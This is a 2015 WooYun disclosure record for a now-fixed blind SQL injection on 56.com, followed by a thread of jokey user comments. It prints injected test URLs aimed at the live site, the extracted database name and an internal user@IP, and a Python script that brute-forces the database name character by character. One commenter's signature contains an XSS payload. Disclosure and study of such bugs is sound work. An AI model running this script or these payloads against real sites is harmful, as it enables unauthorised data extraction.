当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150576

漏洞标题:56.com_www主站存在SQL注入漏洞(附利用脚本)

相关厂商:56.com

漏洞作者: 猪猪侠

提交时间:2015-10-30 12:18

修复时间:2015-12-18 10:22

公开时间:2015-12-18 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向核心白帽子及相关领域专家公开
2015-11-23: 细节向普通白帽子公开
2015-12-03: 细节向实习白帽子公开
2015-12-18: 细节向公众公开

简要描述:

56.com_www主站存在SQL注入漏洞(附利用脚本),引入SQLMAP的payload果然生猛

详细说明:

#1 注入地址
回显正常

http://www.56.com/w/movie/get.phtml?callback=jsonp_operaNew&slite=1&mid=24132' AND 1=1 AND '8281'='8281&key=admin&vid=128956652

回显空白

http://www.56.com/w/movie/get.phtml?callback=jsonp_operaNew&slite=1&mid=24132' AND 1=2 AND '8281'='8281&key=admin&vid=128956652


#2 利用,判断返回的文件大小

56.jpg


漏洞证明:

#3 EXPLOIT
数据库:56_movie
数据库用户:bgf1e6mn@10.11.80.43
#4 利用脚本

#!/usr/bin/env python
# encoding: utf-8
# 56.py 
# ringzero@0x557.org
import requests
import time
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
for i in range(1,25):
    for _str in payloads:
        url = "http://www.56.com/w/movie/get.phtml?callback=jsonp_operaNew&slite=1&mid=24132' AND ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + " AND '8281'='8281&key=admin&vid=128956652"
        result = requests.get(url).text
        if len(result) > 5000:
            print _str
            break

修复方案:

# 过滤

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-11-03 10:20

厂商回复:

确认漏洞,已经修复

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-30 12:18 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    引入SQLMAP的payloads果然生猛

  2. 2015-10-30 12:19 | 日出东方 ( 普通白帽子 | Rank:390 漏洞数:122 )

    引入SQLMAP的payloads果然生猛

  3. 2015-10-30 12:19 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2180 漏洞数:298 | 天天向上 !!!)

    SQLMAP的payloads果然生猛

  4. 2015-10-30 12:22 | 玉林嘎 ( 核心白帽子 | Rank:888 漏洞数:103 )

    引入SQLMAP的payloads果然生猛

  5. 2015-10-30 12:22 | sqlfeng ( 普通白帽子 | Rank:218 漏洞数:40 | 我的中国心)

    传说中的666

  6. 2015-10-30 12:22 | 随风的风 ( 普通白帽子 | Rank:180 漏洞数:60 | 微信公众号:233sec 不定期分享各种漏洞思...)

    引入SQLMAP的payloads果然生猛

  7. 2015-10-30 12:23 | DloveJ ( 普通白帽子 | Rank:1174 漏洞数:211 | <iframe src=javascript:alert('xss');heig...)

    接下俩想必是wooyun.org_www主站存在SQL注入漏洞(附利用脚本)

  8. 2015-10-30 12:29 | 大师兄 ( 路人 | Rank:14 漏洞数:7 | 每日必关注乌云)

    接下来是wooyun.org_www主站某处配置不当导致所有白帽子帐号/密码/联系方式/等敏感信息泄漏

  9. 2015-10-30 12:31 | DNS ( 普通白帽子 | Rank:543 漏洞数:64 | 没有我,你们就去背IP吧)

    果然牛逼

  10. 2015-10-30 12:31 | Taro ( 普通白帽子 | Rank:194 漏洞数:51 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    引入SQLMAP的payloads果然生猛

  11. 2015-10-30 12:32 | Ch4r0n ( 普通白帽子 | Rank:832 漏洞数:152 | 苦逼青年一个!~~~)

    引入SQLMAP的payloads果然生猛

  12. 2015-10-30 12:35 | Turing ( 路人 | Rank:2 漏洞数:1 | 略)

    引入SQLMAP的payloads果然生猛

  13. 2015-10-30 12:36 | hecate ( 普通白帽子 | Rank:569 漏洞数:89 | ®高级安全工程师 | WooYun认证√)

    引入SQLMAP的payloads果然生猛

  14. 2015-10-30 12:38 | 顺丰优选(乌云厂商)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  15. 2015-10-30 12:41 | 陋室 ( 路人 | Rank:18 漏洞数:7 | 愤怒的bird)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  16. 2015-10-30 12:41 | 学徒 ( 路人 | Rank:6 漏洞数:4 | 浮夸)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  17. 2015-10-30 12:41 | hkAssassin ( 普通白帽子 | Rank:377 漏洞数:70 | 我是一只毛毛虫。)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  18. 2015-10-30 12:42 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  19. 2015-10-30 12:44 | 残冰 ( 普通白帽子 | Rank:206 漏洞数:30 | 专业爆破5000000000000000000000年)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  20. 2015-10-30 12:48 | 深度安全实验室 ( 核心白帽子 | Rank:2685 漏洞数:452 )

    引入SQLMAP的payload果然生猛

  21. 2015-10-30 12:48 | 0c0c0f ( 实习白帽子 | Rank:50 漏洞数:16 | My H34rt c4n 3xploit 4ny h0les!)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  22. 2015-10-30 12:51 | Submit ( 普通白帽子 | Rank:499 漏洞数:111 | 不科学)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  23. 2015-10-30 12:57 | 风花雪月 ( 实习白帽子 | Rank:63 漏洞数:48 | []+[]|[]-[][][][][]%[][]|[]\[]%[][]|[]\[...)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  24. 2015-10-30 12:57 | 随风的风 ( 普通白帽子 | Rank:180 漏洞数:60 | 微信公众号:233sec 不定期分享各种漏洞思...)

    @顺丰优选 猪猪侠已经拿个小本本默默的记下你了。。哈哈

  25. 2015-10-30 12:58 | 0c0c0f ( 实习白帽子 | Rank:50 漏洞数:16 | My H34rt c4n 3xploit 4ny h0les!)

    @顺丰优选 已加入扫描队列。

  26. 2015-10-30 13:03 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @顺丰优选 你和 @顺丰速运 是什么关系?

  27. 2015-10-30 13:09 | DNS ( 普通白帽子 | Rank:543 漏洞数:64 | 没有我,你们就去背IP吧)

    @顺丰优选 你和 @顺丰速运 小心点,放学别走

  28. 2015-10-30 13:11 | 苏州同程旅游网络科技有限公司(乌云厂商)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  29. 2015-10-30 13:21 | 沦沦 ( 普通白帽子 | Rank:586 漏洞数:138 | 爱老婆,爱生活)

    接下来是wooyun.org_www主站SQL注入(附带脚本)

  30. 2015-10-30 13:26 | 牛 小 帅 ( 普通白帽子 | Rank:628 漏洞数:154 | 茶凉了,就不要再续了,再续也不是原来的味...)

    我就站在30楼看着你们,看看有多生猛~~~^_^

  31. 2015-10-30 13:49 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    最近股票行情不是蛮好的嘛

  32. 2015-10-30 13:55 | 顺丰优选(乌云厂商)

    @猪猪侠 同一个集团,不同的事业部,速运是做快递的,我们是做电商,商业的~~~猪哥多给我们挖挖漏洞,看好域名哈~~~别整差了~^_^

  33. 2015-10-30 13:55 | ganggang ( 路人 | Rank:4 漏洞数:2 | 这个号是来乌云聊天的....)

    又一次股灾--------棒棒糖引发的血案

  34. 2015-10-30 13:56 | 齐迹 ( 普通白帽子 | Rank:784 漏洞数:100 | 重庆地区招聘安全工程师。sec.zhubajie.com...)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  35. 2015-10-30 13:58 | 顺丰优选(乌云厂商)

    @DNS 等你兄弟~~~快来~~~~放学唱歌去啊!

  36. 2015-10-30 13:58 | Chinalover ( 路人 | Rank:18 漏洞数:5 | 你看得到我打在屏幕上的字,却看不到我落在...)

    你们会玩

  37. 2015-10-30 13:58 | 顺丰优选(乌云厂商)

    @随风的风 你也记一下~~~~~哈哈

  38. 2015-10-30 14:00 | 霝z ( 普通白帽子 | Rank:101 漏洞数:41 | 不值得生气~就这样。see you soon.)

    耐心等待公布!!~

  39. 2015-10-30 14:04 | Whysec ( 路人 | Rank:20 漏洞数:7 )

    引入SQLMAP的payloads果然生猛

  40. 2015-10-30 14:08 | 大师兄 ( 路人 | Rank:14 漏洞数:7 | 每日必关注乌云)

    忽然发现你们都好会玩!

  41. 2015-10-30 14:12 | 暴走 ( 普通白帽子 | Rank:314 漏洞数:63 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    猪猪侠你是把香港地区的搞了一个遍,又开始回到内陆了.

  42. 2015-10-30 17:19 | luwikes ( 普通白帽子 | Rank:532 漏洞数:79 | 潜心学习~~~)

    猪哥给我们的主站也来一发,看看有多生猛~~~^_^

  43. 2015-11-03 10:23 | Pzacker ( 路人 | Rank:14 漏洞数:6 | 请用你知道的去帮助别人,就像别人当初帮助...)

    6666666666666

  44. 2015-11-03 11:02 | boooooom 认证白帽子 ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)

    你值得拥有。

  45. 2015-11-03 11:42 | zhiher ( 路人 | Rank:16 漏洞数:4 )

    卧槽

  46. 2015-11-03 12:26 | h3hz ( 实习白帽子 | Rank:42 漏洞数:5 )

    耐心等待公布!!~

  47. 2015-11-06 13:37 | 你大爷在此 百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们 大家好 我是王尼玛)

    猪猪侠 为什么不撸国外的?

  48. 2015-11-23 19:04 | 小夜 ( 路人 | Rank:15 漏洞数:8 | 漫长的日子)

    真的会玩